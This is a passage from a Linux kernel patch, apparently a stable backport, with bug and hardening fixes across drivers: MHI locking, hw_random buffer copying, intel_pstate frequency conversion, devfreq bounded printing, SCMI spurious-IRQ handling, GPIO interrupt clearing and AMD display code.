+@@ -1201,6 +1203,9 @@ int mhi_gen_tre(struct mhi_controller *mhi_cntrl, struct mhi_chan *mhi_chan,
+ 	int eot, eob, chain, bei;
+ 	int ret;
+ 
++	/* Protect accesses for reading and incrementing WP */
++	write_lock_bh(&mhi_chan->lock);
++
+ 	buf_ring = &mhi_chan->buf_ring;
+ 	tre_ring = &mhi_chan->tre_ring;
+ 
+@@ -1218,8 +1223,10 @@ int mhi_gen_tre(struct mhi_controller *mhi_cntrl, struct mhi_chan *mhi_chan,
+ 
+ 	if (!info->pre_mapped) {
+ 		ret = mhi_cntrl->map_single(mhi_cntrl, buf_info);
+-		if (ret)
++		if (ret) {
++			write_unlock_bh(&mhi_chan->lock);
+ 			return ret;
++		}
+ 	}
+ 
+ 	eob = !!(flags & MHI_EOB);
+@@ -1236,6 +1243,8 @@ int mhi_gen_tre(struct mhi_controller *mhi_cntrl, struct mhi_chan *mhi_chan,
+ 	mhi_add_ring_element(mhi_cntrl, tre_ring);
+ 	mhi_add_ring_element(mhi_cntrl, buf_ring);
+ 
++	write_unlock_bh(&mhi_chan->lock);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/char/hw_random/core.c b/drivers/char/hw_random/core.c
+index 8f31f9d810305..c319f99377096 100644
+--- a/drivers/char/hw_random/core.c
++++ b/drivers/char/hw_random/core.c
+@@ -24,10 +24,13 @@
+ #include <linux/random.h>
+ #include <linux/sched.h>
+ #include <linux/slab.h>
++#include <linux/string.h>
+ #include <linux/uaccess.h>
+ 
+ #define RNG_MODULE_NAME		"hw_random"
+ 
++#define RNG_BUFFER_SIZE (SMP_CACHE_BYTES < 32 ? 32 : SMP_CACHE_BYTES)
++
+ static struct hwrng *current_rng;
+ /* the current rng has been explicitly chosen by user via sysfs */
+ static int cur_rng_set_by_user;
+@@ -59,7 +62,7 @@ static inline int rng_get_data(struct hwrng *rng, u8 *buffer, size_t size,
+ 
+ static size_t rng_buffer_size(void)
+ {
+-	return SMP_CACHE_BYTES < 32 ? 32 : SMP_CACHE_BYTES;
++	return RNG_BUFFER_SIZE;
+ }
+ 
+ static void add_early_randomness(struct hwrng *rng)
+@@ -211,6 +214,7 @@ static inline int rng_get_data(struct hwrng *rng, u8 *buffer, size_t size,
+ static ssize_t rng_dev_read(struct file *filp, char __user *buf,
+ 			    size_t size, loff_t *offp)
+ {
++	u8 buffer[RNG_BUFFER_SIZE];
+ 	ssize_t ret = 0;
+ 	int err = 0;
+ 	int bytes_read, len;
+@@ -238,34 +242,37 @@ static ssize_t rng_dev_read(struct file *filp, char __user *buf,
+ 			if (bytes_read < 0) {
+ 				err = bytes_read;
+ 				goto out_unlock_reading;
++			} else if (bytes_read == 0 &&
++				   (filp->f_flags & O_NONBLOCK)) {
++				err = -EAGAIN;
++				goto out_unlock_reading;
+ 			}
++
+ 			data_avail = bytes_read;
+ 		}
+ 
+-		if (!data_avail) {
+-			if (filp->f_flags & O_NONBLOCK) {
+-				err = -EAGAIN;
+-				goto out_unlock_reading;
+-			}
+-		} else {
+-			len = data_avail;
++		len = data_avail;
++		if (len) {
+ 			if (len > size)
+ 				len = size;
+ 
+ 			data_avail -= len;
+ 
+-			if (copy_to_user(buf + ret, rng_buffer + data_avail,
+-								len)) {
++			memcpy(buffer, rng_buffer + data_avail, len);
++		}
++		mutex_unlock(&reading_mutex);
++		put_rng(rng);
++
++		if (len) {
++			if (copy_to_user(buf + ret, buffer, len)) {
+ 				err = -EFAULT;
+-				goto out_unlock_reading;
++				goto out;
+ 			}
+ 
+ 			size -= len;
+ 			ret += len;
+ 		}
+ 
+-		mutex_unlock(&reading_mutex);
+-		put_rng(rng);
+ 
+ 		if (need_resched())
+ 			schedule_timeout_interruptible(1);
+@@ -276,6 +283,7 @@ static ssize_t rng_dev_read(struct file *filp, char __user *buf,
+ 		}
+ 	}
+ out:
++	memzero_explicit(buffer, sizeof(buffer));
+ 	return ret ? : err;
+ 
+ out_unlock_reading:
+diff --git a/drivers/cpufreq/intel_pstate.c b/drivers/cpufreq/intel_pstate.c
+index fbe3a40987438..abdd26f7d04c9 100644
+--- a/drivers/cpufreq/intel_pstate.c
++++ b/drivers/cpufreq/intel_pstate.c
+@@ -493,6 +493,30 @@ static inline int intel_pstate_get_cppc_guaranteed(int cpu)
+ }
+ #endif /* CONFIG_ACPI_CPPC_LIB */
+ 
++static int intel_pstate_freq_to_hwp_rel(struct cpudata *cpu, int freq,
++					unsigned int relation)
++{
++	if (freq == cpu->pstate.turbo_freq)
++		return cpu->pstate.turbo_pstate;
++
++	if (freq == cpu->pstate.max_freq)
++		return cpu->pstate.max_pstate;
++
++	switch (relation) {
++	case CPUFREQ_RELATION_H:
++		return freq / cpu->pstate.scaling;
++	case CPUFREQ_RELATION_C:
++		return DIV_ROUND_CLOSEST(freq, cpu->pstate.scaling);
++	}
++
++	return DIV_ROUND_UP(freq, cpu->pstate.scaling);
++}
++
++static int intel_pstate_freq_to_hwp(struct cpudata *cpu, int freq)
++{
++	return intel_pstate_freq_to_hwp_rel(cpu, freq, CPUFREQ_RELATION_L);
++}
++
+ /**
+  * intel_pstate_hybrid_hwp_adjust - Calibrate HWP performance levels.
+  * @cpu: Target CPU.
+@@ -510,6 +534,7 @@ static void intel_pstate_hybrid_hwp_adjust(struct cpudata *cpu)
+ 	int perf_ctl_scaling = cpu->pstate.perf_ctl_scaling;
+ 	int perf_ctl_turbo = pstate_funcs.get_turbo(cpu->cpu);
+ 	int scaling = cpu->pstate.scaling;
++	int freq;
+ 
+ 	pr_debug("CPU%d: perf_ctl_max_phys = %d\n", cpu->cpu, perf_ctl_max_phys);
+ 	pr_debug("CPU%d: perf_ctl_turbo = %d\n", cpu->cpu, perf_ctl_turbo);
+@@ -523,16 +548,16 @@ static void intel_pstate_hybrid_hwp_adjust(struct cpudata *cpu)
+ 	cpu->pstate.max_freq = rounddown(cpu->pstate.max_pstate * scaling,
+ 					 perf_ctl_scaling);
+ 
+-	cpu->pstate.max_pstate_physical =
+-			DIV_ROUND_UP(perf_ctl_max_phys * perf_ctl_scaling,
+-				     scaling);
++	freq = perf_ctl_max_phys * perf_ctl_scaling;
++	cpu->pstate.max_pstate_physical = intel_pstate_freq_to_hwp(cpu, freq);
+ 
+-	cpu->pstate.min_freq = cpu->pstate.min_pstate * perf_ctl_scaling;
++	freq = cpu->pstate.min_pstate * perf_ctl_scaling;
++	cpu->pstate.min_freq = freq;
+ 	/*
+ 	 * Cast the min P-state value retrieved via pstate_funcs.get_min() to
+ 	 * the effective range of HWP performance levels.
+ 	 */
+-	cpu->pstate.min_pstate = DIV_ROUND_UP(cpu->pstate.min_freq, scaling);
++	cpu->pstate.min_pstate = intel_pstate_freq_to_hwp(cpu, freq);
+ }
+ 
+ static inline void update_turbo_state(void)
+@@ -2493,13 +2518,12 @@ static void intel_pstate_update_perf_limits(struct cpudata *cpu,
+ 	 * abstract values to represent performance rather than pure ratios.
+ 	 */
+ 	if (hwp_active && cpu->pstate.scaling != perf_ctl_scaling) {
+-		int scaling = cpu->pstate.scaling;
+ 		int freq;
+ 
+ 		freq = max_policy_perf * perf_ctl_scaling;
+-		max_policy_perf = DIV_ROUND_UP(freq, scaling);
++		max_policy_perf = intel_pstate_freq_to_hwp(cpu, freq);
+ 		freq = min_policy_perf * perf_ctl_scaling;
+-		min_policy_perf = DIV_ROUND_UP(freq, scaling);
++		min_policy_perf = intel_pstate_freq_to_hwp(cpu, freq);
+ 	}
+ 
+ 	pr_debug("cpu:%d min_policy_perf:%d max_policy_perf:%d\n",
+@@ -2873,18 +2897,7 @@ static int intel_cpufreq_target(struct cpufreq_policy *policy,
+ 
+ 	cpufreq_freq_transition_begin(policy, &freqs);
+ 
+-	switch (relation) {
+-	case CPUFREQ_RELATION_L:
+-		target_pstate = DIV_ROUND_UP(freqs.new, cpu->pstate.scaling);
+-		break;
+-	case CPUFREQ_RELATION_H:
+-		target_pstate = freqs.new / cpu->pstate.scaling;
+-		break;
+-	default:
+-		target_pstate = DIV_ROUND_CLOSEST(freqs.new, cpu->pstate.scaling);
+-		break;
+-	}
+-
++	target_pstate = intel_pstate_freq_to_hwp_rel(cpu, freqs.new, relation);
+ 	target_pstate = intel_cpufreq_update_pstate(policy, target_pstate, false);
+ 
+ 	freqs.new = target_pstate * cpu->pstate.scaling;
+@@ -2902,7 +2915,7 @@ static unsigned int intel_cpufreq_fast_switch(struct cpufreq_policy *policy,
+ 
+ 	update_turbo_state();
+ 
+-	target_pstate = DIV_ROUND_UP(target_freq, cpu->pstate.scaling);
++	target_pstate = intel_pstate_freq_to_hwp(cpu, target_freq);
+ 
+ 	target_pstate = intel_cpufreq_update_pstate(policy, target_pstate, true);
+ 
+diff --git a/drivers/cxl/core/region.c b/drivers/cxl/core/region.c
+index 2f7187dbfa2d9..5b7d848a6f01b 100644
+--- a/drivers/cxl/core/region.c
++++ b/drivers/cxl/core/region.c
+@@ -450,7 +450,7 @@ static int alloc_hpa(struct cxl_region *cxlr, resource_size_t size)
+ 	struct cxl_root_decoder *cxlrd = to_cxl_root_decoder(cxlr->dev.parent);
+ 	struct cxl_region_params *p = &cxlr->params;
+ 	struct resource *res;
+-	u32 remainder = 0;
++	u64 remainder = 0;
+ 
+ 	lockdep_assert_held_write(&cxl_region_rwsem);
+ 
+@@ -470,7 +470,7 @@ static int alloc_hpa(struct cxl_region *cxlr, resource_size_t size)
+ 	    (cxlr->mode == CXL_DECODER_PMEM && uuid_is_null(&p->uuid)))
+ 		return -ENXIO;
+ 
+-	div_u64_rem(size, SZ_256M * p->interleave_ways, &remainder);
++	div64_u64_rem(size, (u64)SZ_256M * p->interleave_ways, &remainder);
+ 	if (remainder)
+ 		return -EINVAL;
+ 
+diff --git a/drivers/devfreq/devfreq.c b/drivers/devfreq/devfreq.c
+index fe6644f998872..2951a87ccb979 100644
+--- a/drivers/devfreq/devfreq.c
++++ b/drivers/devfreq/devfreq.c
+@@ -1687,7 +1687,7 @@ static ssize_t trans_stat_show(struct device *dev,
+ 			       struct device_attribute *attr, char *buf)
+ {
+ 	struct devfreq *df = to_devfreq(dev);
+-	ssize_t len;
++	ssize_t len = 0;
+ 	int i, j;
+ 	unsigned int max_state;
+ 
+@@ -1696,7 +1696,7 @@ static ssize_t trans_stat_show(struct device *dev,
+ 	max_state = df->max_state;
+ 
+ 	if (max_state == 0)
+-		return sprintf(buf, "Not Supported.\n");
++		return scnprintf(buf, PAGE_SIZE, "Not Supported.\n");
+ 
+ 	mutex_lock(&df->lock);
+ 	if (!df->stop_polling &&
+@@ -1706,31 +1706,52 @@ static ssize_t trans_stat_show(struct device *dev,
+ 	}
+ 	mutex_unlock(&df->lock);
+ 
+-	len = sprintf(buf, "     From  :   To\n");
+-	len += sprintf(buf + len, "           :");
+-	for (i = 0; i < max_state; i++)
+-		len += sprintf(buf + len, "%10lu",
+-				df->freq_table[i]);
++	len += scnprintf(buf + len, PAGE_SIZE - len, "     From  :   To\n");
++	len += scnprintf(buf + len, PAGE_SIZE - len, "           :");
++	for (i = 0; i < max_state; i++) {
++		if (len >= PAGE_SIZE - 1)
++			break;
++		len += scnprintf(buf + len, PAGE_SIZE - len, "%10lu",
++				 df->freq_table[i]);
++	}
++	if (len >= PAGE_SIZE - 1)
++		return PAGE_SIZE - 1;
+ 
+-	len += sprintf(buf + len, "   time(ms)\n");
++	len += scnprintf(buf + len, PAGE_SIZE - len, "   time(ms)\n");
+ 
+ 	for (i = 0; i < max_state; i++) {
++		if (len >= PAGE_SIZE - 1)
++			break;
+ 		if (df->freq_table[i] == df->previous_freq)
+-			len += sprintf(buf + len, "*");
++			len += scnprintf(buf + len, PAGE_SIZE - len, "*");
+ 		else
+-			len += sprintf(buf + len, " ");
++			len += scnprintf(buf + len, PAGE_SIZE - len, " ");
++		if (len >= PAGE_SIZE - 1)
++			break;
++
++		len += scnprintf(buf + len, PAGE_SIZE - len, "%10lu:",
++				 df->freq_table[i]);
++		for (j = 0; j < max_state; j++) {
++			if (len >= PAGE_SIZE - 1)
++				break;
++			len += scnprintf(buf + len, PAGE_SIZE - len, "%10u",
++					 df->stats.trans_table[(i * max_state) + j]);
++		}
++		if (len >= PAGE_SIZE - 1)
++			break;
++		len += scnprintf(buf + len, PAGE_SIZE - len, "%10llu\n", (u64)
++				 jiffies64_to_msecs(df->stats.time_in_state[i]));
++	}
+ 
+-		len += sprintf(buf + len, "%10lu:", df->freq_table[i]);
+-		for (j = 0; j < max_state; j++)
+-			len += sprintf(buf + len, "%10u",
+-				df->stats.trans_table[(i * max_state) + j]);
++	if (len < PAGE_SIZE - 1)
++		len += scnprintf(buf + len, PAGE_SIZE - len, "Total transition : %u\n",
++				 df->stats.total_trans);
+ 
+-		len += sprintf(buf + len, "%10llu\n", (u64)
+-			jiffies64_to_msecs(df->stats.time_in_state[i]));
++	if (len >= PAGE_SIZE - 1) {
++		pr_warn_once("devfreq transition table exceeds PAGE_SIZE. Disabling\n");
++		return -EFBIG;
+ 	}
+ 
+-	len += sprintf(buf + len, "Total transition : %u\n",
+-					df->stats.total_trans);
+ 	return len;
+ }
+ 
+diff --git a/drivers/dma/dmaengine.c b/drivers/dma/dmaengine.c
+index 8a6e6b60d66f3..892e8389232e7 100644
+--- a/drivers/dma/dmaengine.c
++++ b/drivers/dma/dmaengine.c
+@@ -1103,6 +1103,9 @@ EXPORT_SYMBOL_GPL(dma_async_device_channel_register);
+ static void __dma_async_device_channel_unregister(struct dma_device *device,
+ 						  struct dma_chan *chan)
+ {
++	if (chan->local == NULL)
++		return;
++
+ 	WARN_ONCE(!device->device_release && chan->client_count,
+ 		  "%s called while %d clients hold a reference\n",
+ 		  __func__, chan->client_count);
+diff --git a/drivers/firmware/arm_scmi/common.h b/drivers/firmware/arm_scmi/common.h
+index a1c0154c31c6f..4ac72754c2554 100644
+--- a/drivers/firmware/arm_scmi/common.h
++++ b/drivers/firmware/arm_scmi/common.h
+@@ -244,6 +244,7 @@ void shmem_fetch_notification(struct scmi_shared_mem __iomem *shmem,
+ void shmem_clear_channel(struct scmi_shared_mem __iomem *shmem);
+ bool shmem_poll_done(struct scmi_shared_mem __iomem *shmem,
+ 		     struct scmi_xfer *xfer);
++bool shmem_channel_free(struct scmi_shared_mem __iomem *shmem);
+ 
+ /* declarations for message passing transports */
+ struct scmi_msg_payld;
+diff --git a/drivers/firmware/arm_scmi/mailbox.c b/drivers/firmware/arm_scmi/mailbox.c
+index 25d31dfdad15d..81c902672a305 100644
+--- a/drivers/firmware/arm_scmi/mailbox.c
++++ b/drivers/firmware/arm_scmi/mailbox.c
+@@ -43,6 +43,20 @@ static void rx_callback(struct mbox_client *cl, void *m)
+ {
+ 	struct scmi_mailbox *smbox = client_to_scmi_mailbox(cl);
+ 
++	/*
++	 * An A2P IRQ is NOT valid when received while the platform still has
++	 * the ownership of the channel, because the platform at first releases
++	 * the SMT channel and then sends the completion interrupt.
++	 *
++	 * This addresses a possible race condition in which a spurious IRQ from
++	 * a previous timed-out reply which arrived late could be wrongly
++	 * associated with the next pending transaction.
++	 */
++	if (cl->knows_txdone && !shmem_channel_free(smbox->shmem)) {
++		dev_warn(smbox->cinfo->dev, "Ignoring spurious A2P IRQ !\n");
++		return;
++	}
++
+ 	scmi_rx_callback(smbox->cinfo, shmem_read_header(smbox->shmem), NULL);
+ }
+ 
+diff --git a/drivers/firmware/arm_scmi/shmem.c b/drivers/firmware/arm_scmi/shmem.c
+index 87b4f4d35f062..517d52fb3bcbb 100644
+--- a/drivers/firmware/arm_scmi/shmem.c
++++ b/drivers/firmware/arm_scmi/shmem.c
+@@ -122,3 +122,9 @@ bool shmem_poll_done(struct scmi_shared_mem __iomem *shmem,
+ 		(SCMI_SHMEM_CHAN_STAT_CHANNEL_ERROR |
+ 		 SCMI_SHMEM_CHAN_STAT_CHANNEL_FREE);
+ }
++
++bool shmem_channel_free(struct scmi_shared_mem __iomem *shmem)
++{
++	return (ioread32(&shmem->channel_status) &
++			SCMI_SHMEM_CHAN_STAT_CHANNEL_FREE);
++}
+diff --git a/drivers/gpio/gpio-eic-sprd.c b/drivers/gpio/gpio-eic-sprd.c
+index 8d722e026e9c9..c2857ed0c78ab 100644
+--- a/drivers/gpio/gpio-eic-sprd.c
++++ b/drivers/gpio/gpio-eic-sprd.c
+@@ -318,20 +318,27 @@ static int sprd_eic_irq_set_type(struct irq_data *data, unsigned int flow_type)
+ 		switch (flow_type) {
+ 		case IRQ_TYPE_LEVEL_HIGH:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_DBNC_IEV, 1);
++			sprd_eic_update(chip, offset, SPRD_EIC_DBNC_IC, 1);
+ 			break;
+ 		case IRQ_TYPE_LEVEL_LOW:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_DBNC_IEV, 0);
++			sprd_eic_update(chip, offset, SPRD_EIC_DBNC_IC, 1);
+ 			break;
+ 		case IRQ_TYPE_EDGE_RISING:
+ 		case IRQ_TYPE_EDGE_FALLING:
+ 		case IRQ_TYPE_EDGE_BOTH:
+ 			state = sprd_eic_get(chip, offset);
+-			if (state)
++			if (state) {
+ 				sprd_eic_update(chip, offset,
+ 						SPRD_EIC_DBNC_IEV, 0);
+-			else
++				sprd_eic_update(chip, offset,
++						SPRD_EIC_DBNC_IC, 1);
++			} else {
+ 				sprd_eic_update(chip, offset,
+ 						SPRD_EIC_DBNC_IEV, 1);
++				sprd_eic_update(chip, offset,
++						SPRD_EIC_DBNC_IC, 1);
++			}
+ 			break;
+ 		default:
+ 			return -ENOTSUPP;
+@@ -343,20 +350,27 @@ static int sprd_eic_irq_set_type(struct irq_data *data, unsigned int flow_type)
+ 		switch (flow_type) {
+ 		case IRQ_TYPE_LEVEL_HIGH:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_LATCH_INTPOL, 0);
++			sprd_eic_update(chip, offset, SPRD_EIC_LATCH_INTCLR, 1);
+ 			break;
+ 		case IRQ_TYPE_LEVEL_LOW:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_LATCH_INTPOL, 1);
++			sprd_eic_update(chip, offset, SPRD_EIC_LATCH_INTCLR, 1);
+ 			break;
+ 		case IRQ_TYPE_EDGE_RISING:
+ 		case IRQ_TYPE_EDGE_FALLING:
+ 		case IRQ_TYPE_EDGE_BOTH:
+ 			state = sprd_eic_get(chip, offset);
+-			if (state)
++			if (state) {
+ 				sprd_eic_update(chip, offset,
+ 						SPRD_EIC_LATCH_INTPOL, 0);
+-			else
++				sprd_eic_update(chip, offset,
++						SPRD_EIC_LATCH_INTCLR, 1);
++			} else {
+ 				sprd_eic_update(chip, offset,
+ 						SPRD_EIC_LATCH_INTPOL, 1);
++				sprd_eic_update(chip, offset,
++						SPRD_EIC_LATCH_INTCLR, 1);
++			}
+ 			break;
+ 		default:
+ 			return -ENOTSUPP;
+@@ -370,29 +384,34 @@ static int sprd_eic_irq_set_type(struct irq_data *data, unsigned int flow_type)
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTBOTH, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTMODE, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTPOL, 1);
++			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTCLR, 1);
+ 			irq_set_handler_locked(data, handle_edge_irq);
+ 			break;
+ 		case IRQ_TYPE_EDGE_FALLING:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTBOTH, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTMODE, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTPOL, 0);
++			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTCLR, 1);
+ 			irq_set_handler_locked(data, handle_edge_irq);
+ 			break;
+ 		case IRQ_TYPE_EDGE_BOTH:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTMODE, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTBOTH, 1);
++			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTCLR, 1);
+ 			irq_set_handler_locked(data, handle_edge_irq);
+ 			break;
+ 		case IRQ_TYPE_LEVEL_HIGH:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTBOTH, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTMODE, 1);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTPOL, 1);
++			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTCLR, 1);
+ 			irq_set_handler_locked(data, handle_level_irq);
+ 			break;
+ 		case IRQ_TYPE_LEVEL_LOW:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTBOTH, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTMODE, 1);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTPOL, 0);
++			sprd_eic_update(chip, offset, SPRD_EIC_ASYNC_INTCLR, 1);
+ 			irq_set_handler_locked(data, handle_level_irq);
+ 			break;
+ 		default:
+@@ -405,29 +424,34 @@ static int sprd_eic_irq_set_type(struct irq_data *data, unsigned int flow_type)
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTBOTH, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTMODE, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTPOL, 1);
++			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTCLR, 1);
+ 			irq_set_handler_locked(data, handle_edge_irq);
+ 			break;
+ 		case IRQ_TYPE_EDGE_FALLING:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTBOTH, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTMODE, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTPOL, 0);
++			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTCLR, 1);
+ 			irq_set_handler_locked(data, handle_edge_irq);
+ 			break;
+ 		case IRQ_TYPE_EDGE_BOTH:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTMODE, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTBOTH, 1);
++			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTCLR, 1);
+ 			irq_set_handler_locked(data, handle_edge_irq);
+ 			break;
+ 		case IRQ_TYPE_LEVEL_HIGH:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTBOTH, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTMODE, 1);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTPOL, 1);
++			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTCLR, 1);
+ 			irq_set_handler_locked(data, handle_level_irq);
+ 			break;
+ 		case IRQ_TYPE_LEVEL_LOW:
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTBOTH, 0);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTMODE, 1);
+ 			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTPOL, 0);
++			sprd_eic_update(chip, offset, SPRD_EIC_SYNC_INTCLR, 1);
+ 			irq_set_handler_locked(data, handle_level_irq);
+ 			break;
+ 		default:
+diff --git a/drivers/gpio/gpiolib-acpi.c b/drivers/gpio/gpiolib-acpi.c
+index 787d47e667adb..33d73687e463d 100644
+--- a/drivers/gpio/gpiolib-acpi.c
++++ b/drivers/gpio/gpiolib-acpi.c
+@@ -1626,6 +1626,20 @@ static const struct dmi_system_id gpiolib_acpi_quirks[] __initconst = {
+ 			.ignore_wake = "ELAN0415:00@9",
+ 		},
+ 	},
++	{
++		/*
++		 * Spurious wakeups from TP_ATTN# pin
++		 * Found in BIOS 0.35
++		 * https://gitlab.freedesktop.org/drm/amd/-/issues/3073
++		 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "GPD"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "G1619-04"),
++		},
++		.driver_data = &(struct acpi_gpiolib_dmi_quirk) {
++			.ignore_wake = "PNP0C50:00@8",
++		},
++	},
+ 	{} /* Terminating entry */
+ };
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index a8e1f2cfe12dc..b9983ca99eb7d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -2202,8 +2202,6 @@ retry_init:
+ 
+ 		pci_wake_from_d3(pdev, TRUE);
+ 
+-		pci_wake_from_d3(pdev, TRUE);
+-
+ 		/*
+ 		 * For runpm implemented via BACO, PMFW will handle the
+ 		 * timing for BACO in and out:
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 13e0b521e3dba..f02e509d5facb 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -6677,8 +6677,7 @@ static int dm_encoder_helper_atomic_check(struct drm_encoder *encoder,
+ 	if (IS_ERR(mst_state))
+ 		return PTR_ERR(mst_state);
+ 
+-	if (!mst_state->pbn_div)
+-		mst_state->pbn_div = dm_mst_get_pbn_divider(aconnector->mst_port->dc_link);
++	mst_state->pbn_div = dm_mst_get_pbn_divider(aconnector->mst_port->dc_link);
+ 
+ 	if (!state->duplicated) {
+ 		int max_bpc = conn_state->max_requested_bpc;
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_clk_mgr.c
+index e43b4d7dc60e2..c8136a05a8d32 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_clk_mgr.c
+@@ -131,30 +131,27 @@ static int dcn314_get_active_display_cnt_wa(
+ 	return display_count;
+ }
+ 
+-static void dcn314_disable_otg_wa(struct clk_mgr *clk_mgr_base, struct dc_state *context, bool disable)
++static void dcn314_disable_otg_wa(struct clk_mgr *clk_mgr_base, struct dc_state *context,
++				  bool safe_to_lower, bool disable)
+ {
+ 	struct dc *dc = clk_mgr_base->ctx->dc;
+ 	int i;
+ 
+ 	for (i = 0; i < dc->res_pool->pipe_count; ++i) {
+-		struct pipe_ctx *pipe = &dc->current_state->res_ctx.pipe_ctx[i];
++		struct pipe_ctx *pipe = safe_to_lower
++			? &context->res_ctx.pipe_ctx[i]
++			: &dc->current_state->res_ctx.pipe_ctx[i];
+ 
+ 		if (pipe->top_pipe || pipe->prev_odm_pipe)
+ 			continue;
+ 		if (pipe->stream && (pipe->stream->dpms_off || dc_is_virtual_signal(pipe->stream->signal))) {
+-			struct stream_encoder *stream_enc = pipe->stream_res.stream_enc;
+-
+ 			if (disable) {
+-				if (stream_enc && stream_enc->funcs->disable_fifo)
+-					pipe->stream_res.stream_enc->funcs->disable_fifo(stream_enc);
++				if (pipe->stream_res.tg && pipe->stream_res.tg->funcs->immediate_disable_crtc)
++					pipe->stream_res.tg->funcs->immediate_disable_crtc(pipe->stream_res.tg);
+ 
+-				pipe->stream_res.tg->funcs->immediate_disable_crtc(pipe->stream_res.tg);
+ 				reset_sync_context_for_pipe(dc, context, i);
+ 			} else {
+ 				pipe->stream_res.tg->funcs->enable_crtc(pipe->stream_res.tg);
+-
+-				if (stream_enc && stream_enc->funcs->enable_fifo)
+-					pipe->stream_res.stream_enc->funcs->enable_fifo(stream_enc);
+ 			}
+ 		}
+ 	}
+@@ -254,11 +251,11 @@ void dcn314_update_clocks(struct clk_mgr *clk_mgr_base,
+ 	}
+ 
+ 	if (should_set_clock(safe_to_lower, new_clocks->dispclk_khz, clk_mgr_base->clks.dispclk_khz)) {
+-		dcn314_disable_otg_wa(clk_mgr_base, context, true);
++		dcn314_disable_otg_wa(clk_mgr_base, context, safe_to_lower, true);
+ 
+ 		clk_mgr_base->clks.dispclk_khz = new_clocks->dispclk_khz;
+ 		dcn314_smu_set_dispclk(clk_mgr, clk_mgr_base->clks.dispclk_khz);
+-		dcn314_disable_otg_wa(clk_mgr_base, context, false);
++		dcn314_disable_otg_wa(clk_mgr_base, context, safe_to_lower, false);
+ 
+ 		update_dispclk = true;
+ 	}
+diff --git a/drivers/gpu/drm/amd/display/modules/power/power_helpers.c b/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
+index 67287ad07226c..e2f436dea5654 100644
+--- a/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
++++ b/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
+@@ -818,6 +818,8 @@ bool is_psr_su_specific_panel(struct dc_link *link)
+ 				isPSRSUSupported = false;
+ 			else if (dpcd_caps->sink_dev_id_str[1] == 0x08 && dpcd_caps->sink_dev_id_str[0] == 0x03)
+ 				isPSRSUSupported = false;
++			else if (dpcd_caps->sink_dev_id_str[1] == 0x08 && dpcd_caps->sink_dev_id_str[0] == 0x03)
++				isPSRSUSupported = false;
+ 			else if (dpcd_caps->psr_info.force_psrsu_cap == 0x1)
+ 				isPSRSUSupported = true;
+ 		}
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index 47ff3694ffa57..1d0693dad8185 100644
